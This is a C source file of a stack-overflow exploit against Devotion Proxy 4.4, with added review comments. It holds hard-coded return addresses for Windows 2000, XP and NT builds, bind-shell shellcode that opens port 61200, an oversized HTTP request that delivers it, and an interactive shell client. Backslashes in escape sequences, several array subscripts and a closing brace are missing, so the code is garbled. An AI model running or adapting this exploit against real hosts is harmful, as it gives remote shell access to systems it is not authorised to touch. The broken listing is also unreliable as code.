 

Devotion Proxy 4.4 Stack Overflow Exploit


/*
        _       ___ _ _         _       _            
    __| |_ _ / __| | | _ _   (_)_   _| |__   __ _ ___
    / _` | '_| (_ |_   _| '   | | || | '_ / _` (_-<
    __,_|_|   ___| |_||_||_|/ |_,_|_.__/__,_/__/
                          |__/   Presents....                  
     
      Devotion Proxy 4.4 Stack Overflow Exploit
   
  Vulnerability   discovered   by   drG4njubas[m00]
  Contacts: drG4njubas[at]bk.ru, http://m00.void.ru, #m00sec(@efnet)  
  Greets to Over_G, D4rkGr3y, r4ShR4y, h0snp, ...
 
  Compile with m$ visual c++: cl m00-devproxy.cpp


*/


#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <conio.h>

#pragma comment (lib,"wsock32")

// Target table: one entry per OS / service-pack build, pairing a label with
// the absolute address main() patches into the `jump` trailer (the existing
// comment says it is a "jmp esp"). The addresses are hard-coded per build,
// which is exactly what address-space randomisation is designed to defeat.
// The table is terminated by an entry whose platform pointer is NULL;
// usage() and main() walk it up to that sentinel.
struct{
char *platform;
DWORD retaddr; //jmp esp
}

targets[]={
{"Windows 2000 SP1" , 0x77e3cb4c } ,
{"Windows 2000 SP2" , 0x77e2492b } ,
{"Windows 2000 SP3" , 0x77e2afc5 } ,
{"Windows 2000 SP4" , 0x77e14c29 } ,
{"Windows XP SP0" , 0x77f5801c },
{"Windows XP SP1" , 0x77e626ba },
{"Windows NT SP6" , 0x77f32935 },
NULL // sentinel: platform == NULL, retaddr zero-initialised
};


//Shellcode binds shell to a port 61200
//Download sources from www.m00.ru
//Shellcode binds shell to a port 61200
//Download sources from www.m00.ru
// NOTE(review): opaque payload, reproduced exactly as the page shows it. The
// escape sequences throughout this listing have lost their backslashes
// (an extraction artefact), so the literal is kept as-is and not interpreted.
// main() copies sizeof(shellcode)-1 bytes of it (dropping the terminating
// NUL) into the overflow buffer at offset 1038, and later treats a
// successful connect() to port 61200 as the success signal.
char shellcode[]=
"xEBx0Fx58x80x30x92x40x81x38x6Dx30x30x21x75xF4"
"xEBx05xE8xECxFFxFFxFFx7BxC6x93x92x92xCFxC7xA3"
"x49xF6x19x91xD2x01x19xD1x6DxD2xE7x6Bx19xC1x91"
"xF4xA3x40xF4x2Ax92x82xF4x13xA8xDFxC8xE6x95xBB"
"x50x7Bx60x6Dx6Dx6Dx1Bx41x19xE8xAEx93x45x91xCD"
"xEAx19xD9x8Ax19xE1xB2x19xE9xB6x93x44x93x45x6E"
"x3Fx93x42x04x15x6FxC3xA3x5Bx12x53x9Dx61x34xE0"
"x98x04xCBx15x6FxE6x80xD5xD5x70x74x2Cx9Dx92x92"
"x92xBBx5CxBBx65x7Bx7Ax6Dx6Dx6DxA3x52xF4x19x95"
"x53x72x90x19xE1x8Ex93x44x93x54x3Fx93x42x1Bx54"
"x1Bx45xCFxC5x1Fx0Fx9Dx92x92x92xC1xC5x6Dx44x1F"
"x0FxC1x92x92x92xC1x6Dx42x1Bx55x1Fx0FxC8x92x92"
"x92xC1xC2x6Dx44xA3x5BxC3xC3xC3xC3xFAx93x92x92"
"x92xFAx90x92x92x92x6Dx42x1Bx51x1Fx17xF7x92x92"
"x92xC2xC5x6Dx44xFAx82x92x92x92x1Fx1FxEAx92x92"
"x92xC3xC1x6Dx42x1Fx17xF8x92x92x92xC2xC5x6Dx44"
"xFAx93x92x92x92xC1x6Dx42x1Fx17xE3x92x92x92xC2"
"xC5x6Dx44xA3x5BxC3xC3xC1x6Dx42xCDxC2x1Fx0FxD5"
"x92x92x92xC1xC5x6Dx44xFAx6Dx92x92x92xFAxD2x92"
"x92x92x6Dx42x1Bx51x1Fx1FxBAx92x92x92xC3xC5x6D"
"x44xC1x6Dx42xCAx1BxD1xD2x1BxD1xAEx1BxD1xAAx55"
"xD1xBEx93x93x92x92x1Fx17xAAx92x92x92xC2xC5x6D"
"x44xC1xC1xA3x5BxC3xC3xC3xFAx93x92x92x92xC3xC3"
"x1Fx0Fx1Ex92x92x92xC1xC3x6Dx42x1Fx17x8Ex92x92"
"x92xC2xC5x6Dx44x6Dx42x7Ax35x6Cx6Dx6DxD5xF7xE6"
"xC2xE0xFDxF1xD3xF6xF6xE0xF7xE1xE1x92xDExFDxF3"
"xF6xDExFBxF0xE0xF3xE0xEBxD3x92xD7xEAxFBxE6xC2"
"xE0xFDxF1xF7xE1xE1x92xD5xF7xE6xC1xE6xF3xE0xE6"
"xE7xE2xDBxFCxF4xFDxD3x92xD1xE0xF7xF3xE6xF7xC2"
"xE0xFDxF1xF7xE1xE1xD3x92xD5xFExFDxF0xF3xFExD3"
"xFExFExFDxF1x92xE5xE1xA0xCDxA1xA0x92xC5xC1xD3"
"xC1xFDxF1xF9xF7xE6xD3x92xF0xFBxFCxF6x92xFExFB"
"xE1xE6xF7xFCx92xF3xF1xF1xF7xE2xE6x92x90x92x7D"
"x82x92x92x92x92x92x92x92x92x92x92x92x92x93x92"
"x92x92xF1xFFxF6x92x6Dx30x30x21";


// Trailer that main() copies (minus the terminating NUL) to offset 4096 of
// the overflow buffer, i.e. the point where the saved return address sits.
// The first four bytes are a placeholder: main() overwrites them at runtime
// with targets[t].retaddr for the chosen platform. The remaining bytes are,
// going by the variable name and the existing comment, padding followed by a
// short jump back into the buffer; the escapes are garbled in this listing.
char jump[]=
"x29x4cxe1x77" //retaddr
"x90x90x90x90"
"x90x90x90x90x90"
"xE9xFCxF3xFFxFF";


// Remainder of the HTTP request, sent immediately after the overflow buffer
// (main() sends `exploit`, then `request`). Because this literal begins with
// a space, the 4096+ byte buffer occupies the request-line *method* position:
// on the wire the attack looks like a request line with an absurdly long
// method token, which is the simplest thing for a proxy, WAF or IDS to reject
// or alert on. The "rn" sequences are CRLF pairs that lost their backslashes
// in this listing. main() sends sizeof(request) bytes, so the terminating
// NUL goes over the wire as well.
char request[]=
" /Proxy.dtl?URL=www.m00.ru HTTP/1.1rn"
"Accept: */*rn"
"User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)rn"
"Connection: Keep-Alivern"
"Cookie: session-id=1rnrn";


// Forward declarations for the helpers defined after main().
void usage();
void have_fun(int sock);
DWORD WINAPI recv_thread(LPVOID lpParam);


// Entry point: argv = <host> <port> <platform index into targets[]>.
// Builds a buffer of 4096 filler bytes + the `jump` trailer, plants the
// payload at offset 1038, sends the buffer as the HTTP method token followed
// by `request`, then decides success purely by whether a second connect()
// to port 61200 (the bind-shell port named in the payload comment) succeeds.
// NOTE(review): `void main` is non-standard. Several subscripts appear to
// have been lost from this listing (`targets.platform`, `exploit = 'x90'`,
// `shellcode` on the copy loop), and the brace that closes the argc check
// never appears, so the listing is not syntactically complete as shown.
// Return values of WSAStartup(), socket() and send() are never checked.
void main(int argc, char **argv){

WSADATA wsaData;
SOCKADDR_IN rmaddr;
HOSTENT *addr;
SOCKET sock,shell;
DWORD tmp;
char buf[100], exploit[4096+sizeof(jump)]; // buf is declared but never used
int i,t;

printf("n*******************************************n");
printf(" Devotion Proxy   buffer overflow exploit   n");
printf("       Coded by drG4jubas[m00 Crew]       n");
printf("*******************************************nn");

if(argc<4){
usage();
return;
 

t = atoi(argv[3]); // NOTE(review): negative values pass the `t >= i` check below and index targets[] out of bounds
i = 0;
while(targets.platform)i++; // count entries up to the NULL sentinel (subscript presumably [i], lost in extraction)

if(t >= i){
printf("Bad targetn");
return;
}

memcpy(jump, &targets[t].retaddr, 4); // patch the chosen return address into the trailer's first 4 bytes
for(i = 0; i < sizeof(exploit);i++)exploit = 'x90'; // fill the whole buffer with the 0x90 filler byte
for(i =0; i < sizeof(shellcode)-1; i++)exploit[i+1038] = shellcode; // payload at offset 1038, terminating NUL excluded
memcpy(exploit+4096, jump, sizeof(jump)-1); // trailer at offset 4096, terminating NUL excluded

WSAStartup(MAKEWORD(2,2), &wsaData); // return value unchecked
sock = socket(AF_INET, SOCK_STREAM, 0); // INVALID_SOCKET never checked

addr = gethostbyname(argv[1]);
if(addr != NULL)memcpy(&(rmaddr.sin_addr.s_addr), addr->h_addr_list[0], addr->h_length); // assumes h_length == 4 (AF_INET) — not verified
else{
printf("Can not resolve host namen");
return;
}

rmaddr.sin_family = AF_INET;
rmaddr.sin_port = htons(atoi(argv[2])); // port parsed with atoi: no range or error check

printf("Connecting to %s...", argv[1]);
if(connect(sock,(struct sockaddr *)&rmaddr,sizeof(rmaddr))){ // nonzero means failure
printf("failedn");
return;
}
printf("okn");

printf("Sending exploit...");

    send(sock, exploit, sizeof(exploit), 0); // oversized request-line method token
    send(sock, request, sizeof(request), 0); // sizeof, not strlen: the NUL terminator is sent too

printf("donen");

CreateThread(NULL, 0 ,recv_thread, (LPVOID)sock, 0, &tmp); // drains the server's reply in the background; thread handle is never closed
Sleep(100);

shell = socket(AF_INET, SOCK_STREAM, 0);
rmaddr.sin_port = htons(61200); // same host, bind-shell port named in the payload comment

if(connect(shell,(struct sockaddr *)&rmaddr,sizeof(rmaddr))){ // success criterion: the bind-shell port answers
printf("Exploitation failed:(n");
closesocket(sock); // `shell` is leaked on this path
WSACleanup();
return;
}

printf("Congratulations!!! Shell spawned :Dnn");

have_fun(shell);

closesocket(shell);
closesocket(sock);
WSACleanup();
return;
}

 

// Prints the command-line syntax and enumerates targets[], one index per
// line, stopping at the NULL-platform sentinel.
// NOTE(review): `targets.platform` in the loop header and body was
// presumably `targets[i].platform`; the subscripts are lost in this listing.
void usage(){
int i;
printf("USAGE: ");
printf("m00-devproxy.exe <host> <port> <platform>nn");
printf("Target platforms:n");
for(i =0; targets.platform; i++)
printf("%d - %sn", i, targets.platform);
}

 

// Worker thread started by main() after the request is sent: performs a
// single recv() of up to 128 bytes on the socket passed as the thread
// parameter and discards the data (the return value is not checked and buf
// is never read). Presumably it exists so a server reply does not sit unread
// while main() probes the bind-shell port — confirm against the caller.
DWORD WINAPI recv_thread(LPVOID lpParam){
SOCKET sock;
char buf[128];
sock = (SOCKET)lpParam;
recv(sock, buf, 128, 0);
return 0;
}


// Interactive relay between the local console and the connected socket:
// polls the socket with a 1-second select(), prints whatever arrives, and
// forwards lines typed locally. Returns when select() or recv() reports
// SOCKET_ERROR.
// NOTE(review): off-by-one — buf holds 1024 bytes and recv() may return
// 1024, after which `buf[j]` writes one byte past the end. recv() returning
// 0 (peer closed) is not treated as end-of-stream, so the loop keeps
// polling. The character literals ('' and 'r'/'n') have lost their
// backslashes in this listing. The parameter is declared int although the
// caller passes a SOCKET.
void have_fun(int sock){
char buf[1024];
int i;
fd_set fdread;
TIMEVAL time;
time.tv_sec = 1;  // 1-second poll interval for select()
time.tv_usec = 0;
do{
FD_ZERO(&fdread);
FD_SET(sock, &fdread); // rebuilt each iteration because select() modifies the set
i = select(0, &fdread, NULL, NULL, &time); // nfds is 0; Winsock ignores it
if(i > 0){
int j = recv(sock, buf, 1024, 0);
if(j == SOCKET_ERROR)break;
buf[j] = ''; // intended NUL terminator; out of bounds when j == 1024
printf("%s", buf); // %s stops at the first NUL, so binary output is truncated
}
if(kbhit()){ // non-blocking keyboard check from <conio.h>
fgets(buf, 1024, stdin); // return value unchecked: on EOF the stale buffer is sent
send(sock, buf, strlen(buf), 0);
if(buf[0] == 'r'){ // if the line starts with this character, replace it, echo it locally and send the single byte
buf[0] = 'n';
printf("%c",buf[0]);
send(sock, buf, 1, 0);
}
}  
}while(i != SOCKET_ERROR);
return;
}

 